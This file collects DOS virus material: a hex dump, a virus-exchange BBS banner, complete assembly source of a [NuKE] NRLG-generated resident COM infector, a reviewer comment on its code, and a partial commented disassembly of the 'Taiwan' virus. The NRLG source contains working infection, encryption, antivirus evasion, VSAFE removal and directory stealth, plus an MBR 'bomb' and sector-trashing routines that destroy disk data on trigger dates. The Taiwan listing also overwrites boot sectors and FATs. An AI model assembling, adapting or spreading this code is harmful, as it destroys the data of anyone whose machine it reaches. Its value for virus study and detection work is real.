28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
;Kiˇrand˘ sz”veg kezdete
28F8:02C0 54 75 Tu
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
28F8:02E0 20 20 20 24 $
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
28F8:0300 C7 .
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;

@ -0,0 +1,590 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall MBR
call TRASH_RN
call ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov ax,351ch ;
int 21h ;store the int 1ch vectors
mov word ptr [trampaint+bp],bx ;in cs:trampaint
mov word ptr [trampaint+2+bp],es ;
mov ax,251ch ;put the int 1ch (clock) vector
push cs ;
pop ds ;
mov dx,offset tardar ;in offset tardar
int 21h ;
mov dx,offset fin ;
int 27h ;main resident the code
NO_DAY: ;
ret ;ret for program
tardar: ;int 1c handler
pushf ;
pusha ;
mov cx,0ffffh ;fuck loop for slow speed
trampa: ;
mov ax,ax ;
loop trampa ;
popa ;
popf ;
JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch
ret ;
trampaint dd ? ;
;--------------------------------;
ÿMBR:
;**************************************
; Start of MBR-BOMB writing
;**************************************
mov ax,9f80h ;very high memory
mov es,ax ;good for buffer
mov ax,0201h ;read the original
mov cx,0001h ;MBR of the disk
mov dx,0080h ;
xor bx,bx ;to buffer 9f80:0000h
int 13h ;
push cs ;
pop ds ;
mov ax,9f80h ;add my MBR-BOMB
mov es,ax ;to real MBR in my
mov si,offset fat ;buffer
xor di,di ;
mov cx,105 ;ds:[fat]=>9f80:0000h
repe movsb ;total 105bytes
mov ax,9f80h ;
mov es,ax ;
xor bx,bx ;replace the original
mov ax,0301h ;MBR in the disk by the
xor ch,ch ;new MBR-BOMB.
mov dx,0080h ;
mov cl,1 ;WARNING! VSAFE/MSAVE
mov bx,0 ;NOTIFY THIS ACTION
int 13h ;
ret ;
;---------------------------------------------------
;*********************
; Start of MBR code
;*********************
fat: ;
cli ;#
xor ax,ax ;#
mov ss,ax ;#
mov sp,7C00h ;#
mov si,sp ;#
push ax ;#
pop es ;#
push ax ;#
pop ds ;#
sti ;#
;#
pushf ;#
push ax ;#
push cx ;# = This code be in the
push dx ;# original MBR
push ds ;# (NOT MODIFY)
push es ;#
MOV AH,04H ; Read real tyme
INT 1AH ; Clock
CMP DH,cs:byte ptr action_mes ; is Month?
JE CAGO ; yes! SNIF SNIF HD.
lit:
pop es
pop ds
pop dx
pop cx
pop ax
popf
jmp booti
CAGO:
;++++++++++++++++++++++++++++++++++++++++++++++++++++
; START OF YOUR DESTRUCTIVE CODE (or not destructive)
;++++++++++++++++++++++++++++++++++++++++++++++++++++
rip_hd:
;@
xor dx, dx ;@
rip_hd1: ;@
mov cx, 2 ;@
mov ax, 311h ;@
mov dl, 80h ;@
mov bx, 5000h ;@
mov es, bx ;@
int 13h ;@
jae rip_hd2 ;@
xor ah, ah ;@
int 13h ;@
rip_hd2: ;@
inc dh ;@
cmp dh, 4 ;@
jb rip_hd1 ;@
inc ch ;@
jmp rip_hd
;+++++++++++++++++++++++++++++++++++++++++++
; END OF YOUR DESTRUCUTIVE CODE
;+++++++++++++++++++++++++++++++++++++++++++
booti:
xor ax,ax ;#
mov es,ax ;#
mov bx,7c00h ;#
mov ah,02 ;#
mov al,1 ;#
mov cl,1 ;# #= This code be
mov ch,0 ;# in the original
mov dh,1 ;# MBR
mov dl,80h ;# (NOT MODIFY)
;#
int 13h ;#
;#
db 0eah,00,7ch,00,00 ;#
;*******************
; END OF MBR CODE
;*******************
ÿ;---------------------------------
TRASH_RN: ;
MOV AH,2DH ;
INT 21H ;get date
CMP Dl,6 ;is =6 (RAN 0-99)
jne NO_DAYY ;nop! fuck ret
mov ah,0dh ;
int 21h ;reset disk
mov al,2 ;
mov cx,0ffffh ;
mov dx,0 ;
int 26h ;fuck ffffh sector
mov ah,0dh ;reste disk
int 21h ;
mov al,2 ;
mov cx,0ffffh ;
mov dx,0ffffh ;new fuck+
int 26h ;heheheh!!!
NO_DAYY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 01H ;day for the action
action_mes Db 01H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
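Review bot: The comments on the two skip checks inside `REPRODUCCION` are inverted and would mislead an analyst reading this archived listing: at `jne seguir ;yes! the file is infected!` the branch is taken when the masked seconds bits do not equal `FECHA`, i.e. when the file is not yet marked, and at `jne er1 ;yes! is a EXE... fuckkk!` the jump is taken when the first word is not 'MZ'. Suggested replacements: `jne seguir ;seconds mark absent -> not infected, continue` and `jne er1 ;first word not 'MZ' -> not an EXE, continue`. Those same two checks are the sample's observable markers — a file time whose seconds bits are ORed with `FECHA` (1Eh) at `cerrar`, and the residency probe `AX=0CACAh` answered with `BH=0CAh` in the INT 21h handler — and a one-line note listing them next to the banner would serve detection writers better than the banner text does. The stray 0FFh (`ÿ`) bytes at the start of several lines (before `inc di`, `call MBR`, `MBR:`, `TRASH_RN`, `ANTI_V`, `dir_s`, `action_dia`) look like artefacts of the generator that produced the original file and are worth recording as part of the artefact rather than being left unexplained.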

@ -0,0 +1,407 @@
PAGE 60,132
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Progrming Research Group T.R.A.U.M.A. º
; º Universidade Autonoma de Lisboa º
; º The 'Taiwan' Virus º
; º Disassembled by J.L. and J.C, Feb 1990 º
; º º
; º Not Copyrighted (c) Jean Luz. º
; º º
; º This listing is only to be made available to TRAUMA researchers º
; º º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.1
data_1e equ 58h ; (0000:0058=0A9Ch)
data_2e equ 5Ah ; (0000:005A=0D81h)
data_3e equ 475h ; (0000:0475=2)
data_7e equ 95h ; (76AC:0095=0A1h)
data_8e equ 96h ; (76AC:0096=58h)
data_9e equ 98h ; (76AC:0098=44A3h)
data_10e equ 9Ah ; (76AC:009A=2601h)
data_11e equ 9Eh ; (76AC:009E=0)
data_12e equ 114h ; (76AC:0114=0BAh)
data_13e equ 13Eh ; (76AC:013E=9Eh)
data_14e equ 13Fh ; (76AC:013F=0)
data_15e equ 140h ; (76AC:0140=21CDh)
data_16e equ 142h ; (76AC:0142=0B4h)
data_17e equ 143h ; (76AC:0143=3Dh)
data_18e equ 144h ; (76AC:0144=2B0h)
data_19e equ 146h ; (76AC:0146=9EBAh)
data_20e equ 148h ; (76AC:0148=0)
data_21e equ 14Bh ; (76AC:014B=8Bh)
data_22e equ 17Ah ; (76AC:017A=40h)
code_seg_a segment
assume cs:code_seg_a, ds:code_seg_a
tw proc far
jmp short loc_a
db 0B0h, 67h, 3Ch, 67h
db 0CFh, 2Ah, 2Eh, 63h, 6Fh, 6Dh
db 0, 2Ah, 0, 5Ch, 0, 2Eh
db 2Eh, 0, 0, 5Ch, 0
db 31h
db 40 dup (0)
db 64h, 0, 0, 0, 50h, 10h
db 0, 0FCh, 0,
loc_a: jmp short loc_1
db 0EDh
db 0D8h, 0CFh, 0CFh, 0DEh, 0C3h, 0C4h
db 0CDh, 0D9h, 8Ah, 0CCh, 0D8h, 0C5h
db 0C7h, 8Ah, 0E4h, 0CBh, 0DEh, 0C3h
db 0C5h, 0C4h, 0CBh, 0C6h, 8Ah, 0E9h
db 0CFh, 0C4h, 0DEh, 0D8h, 0CBh, 0C6h
db 8Ah, 0FFh, 0C4h, 0C3h, 0DCh, 0CFh
db 0D8h, 0D9h, 0C3h, 0DEh, 0D3h, 8Ah
db 8Bh, 0Ah, 0Dh, 24h, 0E3h, 0D9h
db 8Ah, 0DEh, 0C5h, 0CEh, 0CBh, 0D3h
db 8Ah, 0D9h, 0DFh, 0C4h, 0C4h, 0D3h
db 8Ah, 95h
db 0Ah, 0Dh, 24h
loc_1:
cli ; Disable interrupts
push es
mov ax,0
mov es,ax
;
; To begin, let's read and change some interrupts - replacing one with other
;
mov ax,es:data_1e ; (0000:0058=0A9Ch)
mov ds:data_18e,ax ; (76AC:0144=2B0h)
mov ax,es:data_2e ; (0000:005A=0D81h)
mov ds:data_19e,ax ; (76AC:0146=9EBAh)
mov word ptr es:data_1e,102h ; (0000:0058=0A9Ch)
mov es:data_2e,cs ; (0000:005A=0D81h)
pop es
;
; now reprogram the primary interrupt controller (the only one on the PC/XT)
in al,21h ; port 21h, 8259-1 int IMR
or al,2
out 21h,al ; port 21h, 8259-1 int comands
sti ; Enable interrupts
mov cx,80h
mov si,0
mov bx,80h
locloop_2:
mov ax,[bx+si]
push ax
inc si
inc si
loop locloop_2 ; Loop if cx > 0
mov byte ptr ds:data_12e,0 ; (76AC:0114=0BAh)
mov byte ptr ds:data_13e,0 ; (76AC:013E=9Eh)
mov byte ptr ds:data_14e,0 ; (76AC:013F=0)
mov byte ptr ds:data_20e,0 ; (76AC:0148=0)
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
; then store it
mov ds:data_12e,al ; (76AC:0114=0BAh)
mov ds:data_17e,al ; (76AC:0143=3Dh)
mov ah,47h
mov dl,0
mov si,116h
int 21h ; DOS Services ah=function 47h
; get full pathname for current drive
; putting it in the buffer pointed to by SI
push ds
mov ax,0
mov ds,ax
mov al,ds:data_3e ; (0000:0475=2)
pop ds
mov ds:data_16e,al ; (76AC:0142=0B4h)
cmp al,0
je loc_3 ; Jump if equal (drive c)
mov ah,0Eh
mov dl,2
mov ds:data_17e,dl ; (76AC:0143=3Dh)
int 21h ; DOS Services ah=function 0Eh
; set default drive C:
loc_3:
mov ah,3Bh ; ';'
mov dx,10Fh
int 21h ; DOS Services ah=function 3Bh
; set current dir, path \
loc_4:
mov ah,4Eh ; 'N'
mov cx,3
mov dx,107h
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match (*.com)
jnc loc_5 ; Jump if carry=0 (if found)
jmp loc_8
loc_5:
mov ax,ds:data_8e ; (76AC:0096=58h)
and ax,1Fh
cmp al,1Fh
jne loc_6 ; Jump if not equal
jmp loc_7
loc_6:
; Now it has found a .COM file, opens it then writes itself to it
; and here it makes it's biggest mistake: it writes itself to the OS files,
; leaving them inoperational
mov ax,ds:data_10e ; (76AC:009A=2601h)
mov ds:data_15e,ax ; (76AC:0140=21CDh)
mov ah,43h ; 'C'
mov al,1
mov cl,ds:data_7e ; (76AC:0095=0A1h)
and cx,0FEh
mov dx,9Eh
int 21h ; DOS Services ah=function 43h
; get/set file attrb, file found
mov ah,3Dh ; '='
mov al,2
mov dx,9Eh
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
mov cx,2E7h
mov dx,0F800h
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov ah,42h ; 'B'
mov al,0
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
mov cx,2E7h
mov dx,100h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,42h ; 'B'
mov al,2
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
mov cx,2E7h
mov dx,0F800h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,57h ; 'W'
mov al,1
mov cx,ds:data_8e ; (76AC:0096=58h)
mov dx,ds:data_9e ; (76AC:0098=44A3h)
or cl,1Fh
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,43h ; 'C'
mov al,1
mov cl,ds:data_7e ; (76AC:0095=0A1h)
mov dx,9Eh
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
inc byte ptr ds:data_13e ; (76AC:013E=9Eh)
cmp byte ptr ds:data_13e,3 ; (76AC:013E=9Eh)
je loc_15 ; Jump if equal
loc_7:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_8 ; Jump if carry Set (if no more .com files)
jmp loc_5 ; infect next file
loc_8:
; Now (I'm not sure about this) I think it's looking for subdirectories, so it can spread there
; too.
mov ah,4Eh ; 'N'
mov dx,10Dh
mov cx,12h
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_13 ; Jump if carry Set
loc_9:
cmp byte ptr ds:data_11e,2Eh ; (76AC:009E=0) '.'
jne loc_11 ; Jump if not equal
loc_10:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_9 ; Jump if carry=0
jmp short loc_13
loc_11:
mov ah,3Bh ; ';'
mov dx,9Eh
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
jc loc_10 ; Jump if carry Set
mov cx,0Bh
mov si,0
mov bx,80h
locloop_12:
mov ax,[bx+si]
push ax
inc si
inc si
loop locloop_12 ; Loop if cx > 0
inc byte ptr ds:data_14e ; (76AC:013F=0)
jmp loc_4
; yes, it should have been directories, for now it has changed the path and has gone
; off infecting files again
loc_13:
; if it has found them all, it goes on to the next wickedness...
cmp byte ptr ds:data_14e,0 ; (76AC:013F=0)
je loc_15 ; Jump if equal
dec byte ptr ds:data_14e ; (76AC:013F=0)
mov ah,3Bh ; ';'
mov dx,111h
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
mov cx,0Bh
mov di,14h
mov bx,80h
locloop_14:
pop ax
mov [bx+di],ax
dec di
dec di
loop locloop_14 ; Loop if cx > 0
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_13 ; Jump if carry Set
jmp short loc_9
loc_15:
; Finally, it it wasn't bugged and very amateurish
; (making the infected files useless)
; it would check for a date and then destroy the current disk if it was that date
; ( The 8 of each month. Why???)
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
cmp dl,8
jne loc_16 ; Jump if not equal
mov byte ptr ds:data_20e,1 ; (76AC:0148=0)
mov al,ds:data_17e ; (76AC:0143=3Dh)
mov cx,0A0h
mov dx,0
mov bx,0
int 26h ; Absolute disk write, drive al
; Write over the boot sector (and the partition table, if it's a hard disk),
;the root directory and probably both FATs (if the DOS partition is the first
; on the HD, off course), then try doing the same to second HD)
popf ; Pop flags
cmp byte ptr ds:data_16e,2 ; (76AC:0142=0B4h)
jne loc_17 ; Jump if not equal
mov al,3
mov cx,0A0h
mov dx,0
mov bx,0
int 26h ; Absolute disk write, drive al
popf ; Pop flags
jmp short loc_17
loc_16:
mov ah,0Eh
mov dl,ds:data_12e ; (76AC:0114=0BAh)
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov ah,3Bh ; ';'
mov dx,115h
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
; Now change the interrupts again
loc_17:
cli ; Disable interrupts
push es
mov ax,0
mov es,ax
mov ax,ds:data_18e ; (76AC:0144=2B0h)
mov es:data_1e,ax ; (0000:0058=0A9Ch)
mov ax,ds:data_19e ; (76AC:0146=9EBAh)
mov es:data_2e,ax ; (0000:005A=0D81h)
pop es
in al,21h ; port 21h, 8259-1 int IMR
and al,0FDh
out 21h,al ; port 21h, 8259-1 int comands
sti ; Enable interrupts
cmp byte ptr ds:data_20e,1 ; (76AC:0148=0)
jne loc_20 ; Jump if not equal
mov cx,2Ch
mov di,0
mov bx,14Bh
locloop_18:
xor byte ptr [bx+di],0AAh
inc di
loop locloop_18 ; Loop if cx > 0
mov cx,10h
mov di,0
mov bx,17Ah
locloop_19:
; Finally write something on the screen, it seems like blanks
